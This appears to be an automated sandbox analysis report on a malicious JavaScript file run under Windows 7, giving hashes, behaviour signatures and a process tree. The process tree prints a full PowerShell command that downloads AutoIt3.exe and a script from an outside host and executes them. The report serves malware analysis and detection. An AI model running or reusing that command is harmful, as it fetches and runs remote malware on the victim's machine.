Analysis
-
max time kernel
119s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20231020-en -
resource tags
arch:x64arch:x86image:win7-20231020-enlocale:en-usos:windows7-x64system -
submitted
30-10-2023 16:19
Static task
static1
Behavioral task
behavioral1
Sample
31102023_0018_sta.js
Resource
win7-20231020-en
4 signatures
150 seconds
General
-
Target
31102023_0018_sta.js
-
Size
135KB
-
MD5
e8d3f1c032e4333cdeb1f88a463b1fd2
-
SHA1
4c5dbe8b97b8be956f00543731a63f7b1b007e30
-
SHA256
108d14d4973a937b7cc50efd9899c4eee458667810f9aae74e7eeba1312a9b73
-
SHA512
cb4e6b08b0328cd05c43634809e5162f1009bebabcb370a20e84028f8cbb3413cc90f748c63498be02b33e6bec7bbc6bdfa6328b64da9494797d34badce30b7b
-
SSDEEP
1536:uZUTSCM9Cfq7u02PmUVdGXjXl4xc5KTPBoMqS7j8frPWgtZPnCUQrNgZnFFQE/0J:NT9U7hgaX6eerjqlI2IO6Mzqfh
Score
3/10
Malware Config
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid Process 2240 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid Process Token: SeDebugPrivilege 2240 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
wscript.exedescription pid Process procid_target PID 1392 wrote to memory of 2240 1392 wscript.exe 29 PID 1392 wrote to memory of 2240 1392 wscript.exe 29 PID 1392 wrote to memory of 2240 1392 wscript.exe 29
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\31102023_0018_sta.js1⤵
- Suspicious use of WriteProcessMemory
PID:1392 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command ni 'C:/tepp' -Type Directory -Force;cd 'C:/tepp'; Invoke-WebRequest -Uri 'http://sftp.noheroway.com:443' -OutFile 'AutoIt3.exe' -UserAgent 'curl/7.68.0';Invoke-WebRequest -Uri 'http://sftp.noheroway.com:443/msiydguxwlx' -OutFile 'ydguxwlx.au3' -UserAgent 'curl/7.68.0';start 'AutoIt3.exe' -a 'ydguxwlx.au3'"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2240
-